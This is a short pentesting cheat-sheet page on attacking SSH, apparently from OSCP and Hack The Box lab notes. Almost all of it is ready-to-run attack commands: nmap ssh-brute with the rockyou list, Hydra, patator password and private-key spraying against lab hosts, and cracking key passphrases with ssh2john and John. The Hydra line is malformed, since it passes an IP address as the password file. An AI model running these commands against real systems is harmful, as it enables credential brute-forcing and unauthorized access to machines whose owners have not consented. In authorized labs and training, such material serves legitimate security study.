SSH - 22

NMAP

ls /usr/share/nmap/scripts/ | grep SSH

nmap –script ssh-brute –script-args=userdb=/root/HTB/hosts/shocker/user.lst,passdb=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt,brute.emptypass=True -d -v -sV -p 2222 10.10.10.56

Hydra

hydra -l rabakuku -P 192.168.1.1 ssh

SSH combo list

patator ssh_login host=FILE0 user=COMBO10 password=COMBO11 0=./ssh-open.nmap 1=./combo-creds.txt

Single user many passwords

patator ssh_login host=10.10.10.56 port=2222 –timeout 30 –threads=20 user=root password=FILE0 0=/root/oscp/lab-net2019/passwords.txt -x ignore:mesg=’Authentication failed.’

SSH Private Key Spray

patator ssh_login keyfile=rsakey.cfg host=FILE0 user=bob 0=/root/oscp/lab-net2019/ssh-open.nmap –max-retries 1 –timeout 10

#spray keyfile against 1 host and try many users
patator ssh_login keyfile=./f1fb2162a02f0f7c40c210e6167f05ca-16858 host=10.31.1.133 user=FILE0 0=./users.lst –max-retries 3 –timeout 100

Find SSH Keyphrase with John - Crack SSH Private Key

First we’ll need to convert the ssh key using ssh2john with this command. Crack ssh.

python ssh2john.py SecretKey > SecretKey.hash
#After give it to john…
sudo john SecretKey.hash -wordlist=INSERTWORDLIST!

PreviousSNMTP - 199 NextTELNET - 23

Last updated 4 years ago

Was this helpful?